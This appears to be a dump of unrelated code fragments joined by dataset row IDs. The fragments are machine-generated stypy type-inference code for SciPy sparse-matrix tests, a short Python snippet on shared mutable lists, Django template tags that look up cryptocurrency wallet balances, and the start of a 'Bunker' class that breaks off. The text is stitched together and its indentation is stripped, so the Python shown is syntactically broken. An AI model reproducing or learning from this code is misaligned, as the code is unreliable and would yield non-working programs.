range_call_result_459748 = invoke(stypy.reporting.localization.Localization(__file__, 27, 13), range_459745, *[N_459746], **kwargs_459747)
# Testing the type of a for loop iterable (line 27)
is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 27, 4), range_call_result_459748)
# Getting the type of the for loop variable (line 27)
for_loop_var_459749 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 27, 4), range_call_result_459748)
# Assigning a type to the variable 'i' (line 27)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 27, 4), 'i', for_loop_var_459749)
# SSA begins for a for statement (line 27)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
# Getting the type of 'slices' (line 28)
slices_459750 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 28, 18), 'slices')
# Testing the type of a for loop iterable (line 28)
is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 28, 8), slices_459750)
# Getting the type of the for loop variable (line 28)
for_loop_var_459751 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 28, 8), slices_459750)
# Assigning a type to the variable 'sl' (line 28)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 28, 8), 'sl', for_loop_var_459751)
# SSA begins for a for statement (line 28)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
# Call to _check_csr_rowslice(...): (line 29)
# Processing the call arguments (line 29)
# Getting the type of 'i' (line 29)
i_459753 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 32), 'i', False)
# Getting the type of 'sl' (line 29)
sl_459754 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 35), 'sl', False)
# Getting the type of 'X' (line 29)
X_459755 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 39), 'X', False)
# Getting the type of 'Xcsr' (line 29)
Xcsr_459756 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 42), 'Xcsr', False)
# Processing the call keyword arguments (line 29)
kwargs_459757 = {}
# Getting the type of '_check_csr_rowslice' (line 29)
_check_csr_rowslice_459752 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 12), '_check_csr_rowslice', False)
# Calling _check_csr_rowslice(args, kwargs) (line 29)
_check_csr_rowslice_call_result_459758 = invoke(stypy.reporting.localization.Localization(__file__, 29, 12), _check_csr_rowslice_459752, *[i_459753, sl_459754, X_459755, Xcsr_459756], **kwargs_459757)
# SSA join for a for statement
module_type_store = module_type_store.join_ssa_context()
# SSA join for a for statement
module_type_store = module_type_store.join_ssa_context()
# ################# End of 'test_csr_rowslice(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'test_csr_rowslice' in the type store
# Getting the type of 'stypy_return_type' (line 15)
stypy_return_type_459759 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_459759)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'test_csr_rowslice'
return stypy_return_type_459759
# Assigning a type to the variable 'test_csr_rowslice' (line 15)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 15, 0), 'test_csr_rowslice', test_csr_rowslice)
@norecursion
def test_csr_getrow(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
defaults = []
# Create a new context for function 'test_csr_getrow'
module_type_store = module_type_store.open_function_context('test_csr_getrow', 32, 0, False)
# Passed parameters checking function
test_csr_getrow.stypy_localization = localization
test_csr_getrow.stypy_type_of_self = None
test_csr_getrow.stypy_type_store = module_type_store
test_csr_getrow.stypy_function_name = 'test_csr_getrow'
test_csr_getrow.stypy_param_names_list = []
test_csr_getrow.stypy_varargs_param_name = None
test_csr_getrow.stypy_kwargs_param_name = None
test_csr_getrow.stypy_call_defaults = defaults
test_csr_getrow.stypy_call_varargs = varargs
test_csr_getrow.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'test_csr_getrow', [], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'test_csr_getrow', localization, [], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'test_csr_getrow(...)' code ##################
# Assigning a Num to a Name (line 33):
int_459760 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 33, 8), 'int')
# Assigning a type to the variable 'N' (line 33)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 33, 4), 'N', int_459760)
# Call to seed(...): (line 34)
# Processing the call arguments (line 34)
int_459764 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 19), 'int')
# Processing the call keyword arguments (line 34)
kwargs_459765 = {}
# Getting the type of 'np' (line 34)
np_459761 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 34, 4), 'np', False)
# Obtaining the member 'random' of a type (line 34)
random_459762 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 34, 4), np_459761, 'random')
# Obtaining the member 'seed' of a type (line 34)
seed_459763 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 34, 4), random_459762, 'seed')
# Calling seed(args, kwargs) (line 34)
seed_call_result_459766 = invoke(stypy.reporting.localization.Localization(__file__, 34, 4), seed_459763, *[int_459764], **kwargs_459765)
# Assigning a Call to a Name (line 35):
# Call to random(...): (line 35)
# Processing the call arguments (line 35)
# Obtaining an instance of the builtin type 'tuple' (line 35)
tuple_459770 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 35, 26), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 35)
# Adding element type (line 35)
# Getting the type of 'N' (line 35)
N_459771 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 26), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 35, 26), tuple_459770, N_459771)
# Adding element type (line 35)
# Getting the type of 'N' (line 35)
N_459772 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 29), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 35, 26), tuple_459770, N_459772)
# Processing the call keyword arguments (line 35)
kwargs_459773 = {}
# Getting the type of 'np' (line 35)
np_459767 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 8), 'np', False)
# Obtaining the member 'random' of a type (line 35)
random_459768 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 35, 8), np_459767, 'random')
# Obtaining the member 'random' of a type (line 35)
random_459769 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 35, 8), random_459768, 'random')
# Calling random(args, kwargs) (line 35)
random_call_result_459774 = invoke(stypy.reporting.localization.Localization(__file__, 35, 8), random_459769, *[tuple_459770], **kwargs_459773)
# Assigning a type to the variable 'X' (line 35)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 35, 4), 'X', random_call_result_459774)
# Assigning a Num to a Subscript (line 36):
int_459775 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 36, 17), 'int')
# Getting the type of 'X' (line 36)
X_459776 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 4), 'X')
# Getting the type of 'X' (line 36)
X_459777 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 6), 'X')
float_459778 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 36, 10), 'float')
# Applying the binary operator '>' (line 36)
result_gt_459779 = python_operator(stypy.reporting.localization.Localization(__file__, 36, 6), '>', X_459777, float_459778)
# Storing an element on a container (line 36)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 36, 4), X_459776, (result_gt_459779, int_459775))
# Assigning a Call to a Name (line 37):
# Call to csr_matrix(...): (line 37)
# Processing the call arguments (line 37)
# Getting the type of 'X' (line 37)
X_459781 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 22), 'X', False)
# Processing the call keyword arguments (line 37)
kwargs_459782 = {}
# Getting the type of 'csr_matrix' (line 37)
csr_matrix_459780 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 11), 'csr_matrix', False)
# Calling csr_matrix(args, kwargs) (line 37)
csr_matrix_call_result_459783 = invoke(stypy.reporting.localization.Localization(__file__, 37, 11), csr_matrix_459780, *[X_459781], **kwargs_459782)
# Assigning a type to the variable 'Xcsr' (line 37)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 37, 4), 'Xcsr', csr_matrix_call_result_459783)
# Call to range(...): (line 39)
# Processing the call arguments (line 39)
# Getting the type of 'N' (line 39)
N_459785 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 39, 19), 'N', False)
# Processing the call keyword arguments (line 39)
kwargs_459786 = {}
# Getting the type of 'range' (line 39)
range_459784 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 39, 13), 'range', False)
# Calling range(args, kwargs) (line 39)
range_call_result_459787 = invoke(stypy.reporting.localization.Localization(__file__, 39, 13), range_459784, *[N_459785], **kwargs_459786)
# Testing the type of a for loop iterable (line 39)
is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 39, 4), range_call_result_459787)
# Getting the type of the for loop variable (line 39)
for_loop_var_459788 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 39, 4), range_call_result_459787)
# Assigning a type to the variable 'i' (line 39)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 39, 4), 'i', for_loop_var_459788)
# SSA begins for a for statement (line 39)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
# Assigning a Subscript to a Name (line 40):
# Obtaining the type of the subscript
# Getting the type of 'i' (line 40)
i_459789 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 40, 20), 'i')
# Getting the type of 'i' (line 40)
i_459790 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 40, 22), 'i')
int_459791 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 40, 26), 'int')
# Applying the binary operator '+' (line 40)
result_add_459792 = python_operator(stypy.reporting.localization.Localization(__file__, 40, 22), '+', i_459790, int_459791)
slice_459793 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 40, 18), i_459789, result_add_459792, None)
slice_459794 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 40, 18), None, None, None)
# Getting the type of 'X' (line 40)
X_459795 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 40, 18), 'X')
# Obtaining the member '__getitem__' of a type (line 40)
getitem___459796 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 40, 18), X_459795, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 40)
subscript_call_result_459797 = invoke(stypy.reporting.localization.Localization(__file__, 40, 18), getitem___459796, (slice_459793, slice_459794))
# Assigning a type to the variable 'arr_row' (line 40)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 40, 8), 'arr_row', subscript_call_result_459797)
# Assigning a Call to a Name (line 41):
# Call to getrow(...): (line 41)
# Processing the call arguments (line 41)
# Getting the type of 'i' (line 41)
i_459800 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 41, 30), 'i', False)
# Processing the call keyword arguments (line 41)
kwargs_459801 = {}
# Getting the type of 'Xcsr' (line 41)
Xcsr_459798 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 41, 18), 'Xcsr', False)
# Obtaining the member 'getrow' of a type (line 41)
getrow_459799 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 41, 18), Xcsr_459798, 'getrow')
# Calling getrow(args, kwargs) (line 41)
getrow_call_result_459802 = invoke(stypy.reporting.localization.Localization(__file__, 41, 18), getrow_459799, *[i_459800], **kwargs_459801)
# Assigning a type to the variable 'csr_row' (line 41)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 41, 8), 'csr_row', getrow_call_result_459802)
# Call to assert_array_almost_equal(...): (line 43)
# Processing the call arguments (line 43)
# Getting the type of 'arr_row' (line 43)
arr_row_459804 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 34), 'arr_row', False)
# Call to toarray(...): (line 43)
# Processing the call keyword arguments (line 43)
kwargs_459807 = {}
# Getting the type of 'csr_row' (line 43)
csr_row_459805 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 43), 'csr_row', False)
# Obtaining the member 'toarray' of a type (line 43)
toarray_459806 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 43, 43), csr_row_459805, 'toarray')
# Calling toarray(args, kwargs) (line 43)
toarray_call_result_459808 = invoke(stypy.reporting.localization.Localization(__file__, 43, 43), toarray_459806, *[], **kwargs_459807)
# Processing the call keyword arguments (line 43)
kwargs_459809 = {}
# Getting the type of 'assert_array_almost_equal' (line 43)
assert_array_almost_equal_459803 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 8), 'assert_array_almost_equal', False)
# Calling assert_array_almost_equal(args, kwargs) (line 43)
assert_array_almost_equal_call_result_459810 = invoke(stypy.reporting.localization.Localization(__file__, 43, 8), assert_array_almost_equal_459803, *[arr_row_459804, toarray_call_result_459808], **kwargs_459809)
# Call to assert_(...): (line 44)
# Processing the call arguments (line 44)
# Call to type(...): (line 44)
# Processing the call arguments (line 44)
# Getting the type of 'csr_row' (line 44)
csr_row_459813 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 21), 'csr_row', False)
# Processing the call keyword arguments (line 44)
kwargs_459814 = {}
# Getting the type of 'type' (line 44)
type_459812 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 16), 'type', False)
# Calling type(args, kwargs) (line 44)
type_call_result_459815 = invoke(stypy.reporting.localization.Localization(__file__, 44, 16), type_459812, *[csr_row_459813], **kwargs_459814)
# Getting the type of 'csr_matrix' (line 44)
csr_matrix_459816 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 33), 'csr_matrix', False)
# Applying the binary operator 'is' (line 44)
result_is__459817 = python_operator(stypy.reporting.localization.Localization(__file__, 44, 16), 'is', type_call_result_459815, csr_matrix_459816)
# Processing the call keyword arguments (line 44)
kwargs_459818 = {}
# Getting the type of 'assert_' (line 44)
assert__459811 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 8), 'assert_', False)
# Calling assert_(args, kwargs) (line 44)
assert__call_result_459819 = invoke(stypy.reporting.localization.Localization(__file__, 44, 8), assert__459811, *[result_is__459817], **kwargs_459818)
# SSA join for a for statement
module_type_store = module_type_store.join_ssa_context()
# ################# End of 'test_csr_getrow(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'test_csr_getrow' in the type store
# Getting the type of 'stypy_return_type' (line 32)
stypy_return_type_459820 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 32, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_459820)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'test_csr_getrow'
return stypy_return_type_459820
# Assigning a type to the variable 'test_csr_getrow' (line 32)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 32, 0), 'test_csr_getrow', test_csr_getrow)
@norecursion
def test_csr_getcol(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
defaults = []
# Create a new context for function 'test_csr_getcol'
module_type_store = module_type_store.open_function_context('test_csr_getcol', 47, 0, False)
# Passed parameters checking function
test_csr_getcol.stypy_localization = localization
test_csr_getcol.stypy_type_of_self = None
test_csr_getcol.stypy_type_store = module_type_store
test_csr_getcol.stypy_function_name = 'test_csr_getcol'
test_csr_getcol.stypy_param_names_list = []
test_csr_getcol.stypy_varargs_param_name = None
test_csr_getcol.stypy_kwargs_param_name = None
test_csr_getcol.stypy_call_defaults = defaults
test_csr_getcol.stypy_call_varargs = varargs
test_csr_getcol.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'test_csr_getcol', [], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'test_csr_getcol', localization, [], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'test_csr_getcol(...)' code ##################
# Assigning a Num to a Name (line 48):
int_459821 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 48, 8), 'int')
# Assigning a type to the variable 'N' (line 48)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 48, 4), 'N', int_459821)
# Call to seed(...): (line 49)
# Processing the call arguments (line 49)
int_459825 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 19), 'int')
# Processing the call keyword arguments (line 49)
kwargs_459826 = {}
# Getting the type of 'np' (line 49)
np_459822 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 49, 4), 'np', False)
# Obtaining the member 'random' of a type (line 49)
random_459823 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 49, 4), np_459822, 'random')
# Obtaining the member 'seed' of a type (line 49)
seed_459824 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 49, 4), random_459823, 'seed')
# Calling seed(args, kwargs) (line 49)
seed_call_result_459827 = invoke(stypy.reporting.localization.Localization(__file__, 49, 4), seed_459824, *[int_459825], **kwargs_459826)
# Assigning a Call to a Name (line 50):
# Call to random(...): (line 50)
# Processing the call arguments (line 50)
# Obtaining an instance of the builtin type 'tuple' (line 50)
tuple_459831 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 50, 26), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 50)
# Adding element type (line 50)
# Getting the type of 'N' (line 50)
N_459832 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 50, 26), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 50, 26), tuple_459831, N_459832)
# Adding element type (line 50)
# Getting the type of 'N' (line 50)
N_459833 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 50, 29), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 50, 26), tuple_459831, N_459833)
# Processing the call keyword arguments (line 50)
kwargs_459834 = {}
# Getting the type of 'np' (line 50)
np_459828 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 50, 8), 'np', False)
# Obtaining the member 'random' of a type (line 50)
random_459829 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 50, 8), np_459828, 'random')
# Obtaining the member 'random' of a type (line 50)
random_459830 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 50, 8), random_459829, 'random')
# Calling random(args, kwargs) (line 50)
random_call_result_459835 = invoke(stypy.reporting.localization.Localization(__file__, 50, 8), random_459830, *[tuple_459831], **kwargs_459834)
# Assigning a type to the variable 'X' (line 50)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 50, 4), 'X', random_call_result_459835)
# Assigning a Num to a Subscript (line 51):
int_459836 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 51, 17), 'int')
# Getting the type of 'X' (line 51)
X_459837 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 4), 'X')
# Getting the type of 'X' (line 51)
X_459838 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 6), 'X')
float_459839 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 51, 10), 'float')
# Applying the binary operator '>' (line 51)
result_gt_459840 = python_operator(stypy.reporting.localization.Localization(__file__, 51, 6), '>', X_459838, float_459839)
# Storing an element on a container (line 51)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 51, 4), X_459837, (result_gt_459840, int_459836))
# Assigning a Call to a Name (line 52):
# Call to csr_matrix(...): (line 52)
# Processing the call arguments (line 52)
# Getting the type of 'X' (line 52)
X_459842 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 52, 22), 'X', False)
# Processing the call keyword arguments (line 52)
kwargs_459843 = {}
# Getting the type of 'csr_matrix' (line 52)
csr_matrix_459841 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 52, 11), 'csr_matrix', False)
# Calling csr_matrix(args, kwargs) (line 52)
csr_matrix_call_result_459844 = invoke(stypy.reporting.localization.Localization(__file__, 52, 11), csr_matrix_459841, *[X_459842], **kwargs_459843)
# Assigning a type to the variable 'Xcsr' (line 52)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 52, 4), 'Xcsr', csr_matrix_call_result_459844)
# Call to range(...): (line 54)
# Processing the call arguments (line 54)
# Getting the type of 'N' (line 54)
N_459846 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 54, 19), 'N', False)
# Processing the call keyword arguments (line 54)
kwargs_459847 = {}
# Getting the type of 'range' (line 54)
range_459845 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 54, 13), 'range', False)
# Calling range(args, kwargs) (line 54)
range_call_result_459848 = invoke(stypy.reporting.localization.Localization(__file__, 54, 13), range_459845, *[N_459846], **kwargs_459847)
# Testing the type of a for loop iterable (line 54)
is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 54, 4), range_call_result_459848)
# Getting the type of the for loop variable (line 54)
for_loop_var_459849 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 54, 4), range_call_result_459848)
# Assigning a type to the variable 'i' (line 54)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 54, 4), 'i', for_loop_var_459849)
# SSA begins for a for statement (line 54)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
# Assigning a Subscript to a Name (line 55):
# Obtaining the type of the subscript
slice_459850 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 55, 18), None, None, None)
# Getting the type of 'i' (line 55)
i_459851 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 55, 23), 'i')
# Getting the type of 'i' (line 55)
i_459852 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 55, 25), 'i')
int_459853 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 55, 29), 'int')
# Applying the binary operator '+' (line 55)
result_add_459854 = python_operator(stypy.reporting.localization.Localization(__file__, 55, 25), '+', i_459852, int_459853)
slice_459855 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 55, 18), i_459851, result_add_459854, None)
# Getting the type of 'X' (line 55)
X_459856 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 55, 18), 'X')
# Obtaining the member '__getitem__' of a type (line 55)
getitem___459857 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 55, 18), X_459856, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 55)
subscript_call_result_459858 = invoke(stypy.reporting.localization.Localization(__file__, 55, 18), getitem___459857, (slice_459850, slice_459855))
# Assigning a type to the variable 'arr_col' (line 55)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 55, 8), 'arr_col', subscript_call_result_459858)
# Assigning a Call to a Name (line 56):
# Call to getcol(...): (line 56)
# Processing the call arguments (line 56)
# Getting the type of 'i' (line 56)
i_459861 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 56, 30), 'i', False)
# Processing the call keyword arguments (line 56)
kwargs_459862 = {}
# Getting the type of 'Xcsr' (line 56)
Xcsr_459859 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 56, 18), 'Xcsr', False)
# Obtaining the member 'getcol' of a type (line 56)
getcol_459860 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 56, 18), Xcsr_459859, 'getcol')
# Calling getcol(args, kwargs) (line 56)
getcol_call_result_459863 = invoke(stypy.reporting.localization.Localization(__file__, 56, 18), getcol_459860, *[i_459861], **kwargs_459862)
# Assigning a type to the variable 'csr_col' (line 56)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 56, 8), 'csr_col', getcol_call_result_459863)
# Call to assert_array_almost_equal(...): (line 58)
# Processing the call arguments (line 58)
# Getting the type of 'arr_col' (line 58)
arr_col_459865 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 34), 'arr_col', False)
# Call to toarray(...): (line 58)
# Processing the call keyword arguments (line 58)
kwargs_459868 = {}
# Getting the type of 'csr_col' (line 58)
csr_col_459866 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 43), 'csr_col', False)
# Obtaining the member 'toarray' of a type (line 58)
toarray_459867 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 58, 43), csr_col_459866, 'toarray')
# Calling toarray(args, kwargs) (line 58)
toarray_call_result_459869 = invoke(stypy.reporting.localization.Localization(__file__, 58, 43), toarray_459867, *[], **kwargs_459868)
# Processing the call keyword arguments (line 58)
kwargs_459870 = {}
# Getting the type of 'assert_array_almost_equal' (line 58)
assert_array_almost_equal_459864 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 58, 8), 'assert_array_almost_equal', False)
# Calling assert_array_almost_equal(args, kwargs) (line 58)
assert_array_almost_equal_call_result_459871 = invoke(stypy.reporting.localization.Localization(__file__, 58, 8), assert_array_almost_equal_459864, *[arr_col_459865, toarray_call_result_459869], **kwargs_459870)
# Call to assert_(...): (line 59)
# Processing the call arguments (line 59)
# Call to type(...): (line 59)
# Processing the call arguments (line 59)
# Getting the type of 'csr_col' (line 59)
csr_col_459874 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 21), 'csr_col', False)
# Processing the call keyword arguments (line 59)
kwargs_459875 = {}
# Getting the type of 'type' (line 59)
type_459873 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 16), 'type', False)
# Calling type(args, kwargs) (line 59)
type_call_result_459876 = invoke(stypy.reporting.localization.Localization(__file__, 59, 16), type_459873, *[csr_col_459874], **kwargs_459875)
# Getting the type of 'csr_matrix' (line 59)
csr_matrix_459877 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 33), 'csr_matrix', False)
# Applying the binary operator 'is' (line 59)
result_is__459878 = python_operator(stypy.reporting.localization.Localization(__file__, 59, 16), 'is', type_call_result_459876, csr_matrix_459877)
# Processing the call keyword arguments (line 59)
kwargs_459879 = {}
# Getting the type of 'assert_' (line 59)
assert__459872 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 59, 8), 'assert_', False)
# Calling assert_(args, kwargs) (line 59)
assert__call_result_459880 = invoke(stypy.reporting.localization.Localization(__file__, 59, 8), assert__459872, *[result_is__459878], **kwargs_459879)
# SSA join for a for statement
module_type_store = module_type_store.join_ssa_context()
# ################# End of 'test_csr_getcol(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'test_csr_getcol' in the type store
# Getting the type of 'stypy_return_type' (line 47)
stypy_return_type_459881 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 47, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_459881)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'test_csr_getcol'
return stypy_return_type_459881
# Assigning a type to the variable 'test_csr_getcol' (line 47)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 47, 0), 'test_csr_getcol', test_csr_getcol)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
991,620 | e404554d5315ce4322bc76de7ccccb1b6bdd163f | class Test():
def __init__(self):
self.x=[1,2,3]
a=Test()
b=Test()
a.x.append([1,2,3])
print(a.x,b.x)
c=list()
d=list()
c.append([1,2,3]) |
991,621 | 80fe0d4dd09b9d7179eb913d793fc9a4fcdd1c29 | import json
import requests
import datetime
from django import template
from apps.accounts.models import User
from apps.coins.utils import *
from apps.coins.models import Coin, NewCoin, EthereumTokenWallet
register = template.Library()
@register.simple_tag
def get_balance_BTC(user):
balance = get_balance(user, "BTC")
if not balance:
balance = 0
return balance
@register.filter
def rcv(mapping, key):
return mapping.get('transactions_rcv_'+key, '')
@register.filter
def snd(mapping, key):
return mapping.get('transactions_snd_'+key, '')
@register.simple_tag
def get_bal_coin(key, user):
try:
balance = get_balance(user, key)
except:
return 0
if not balance:
balance = 0
return balance
@register.simple_tag
def get_pk_bal_coin(key, pk):
user = User.objects.get(pk=pk)
print(user)
print(key)
try:
balance = get_balance(user, key)
except:
return 0
if not balance:
balance = 0
return balance
@register.filter(name='unix_to_datetime')
def unix_to_datetime(value):
try:
date = datetime.datetime.fromtimestamp(int(value))
except:
date = value
return date
@register.simple_tag
def percentage(count):
percentage = (int(count)/100000 )*100
return percentage
@register.simple_tag
def coin_code_to_name(code):
return NewCoin.objects.get(code=code).name
@register.simple_tag
def get_eth_balance(symbol, user):
try:
address = EthereumTokenWallet.objects.get(
user=user, name__contract_symbol=symbol).addresses.all()[0].address
return float(w3.fromWei(w3.eth.getBalance(Web3.toChecksumAddress(address)), "ether"))
except:
return 0.0
|
991,622 | 59209b06ca4f6ecd6e5c8668607b2134e7b82078 | class Bunker:
def __init__(self):
self.survivors = []
self.supplies = []
self.medicine = []
@property
def food(self):
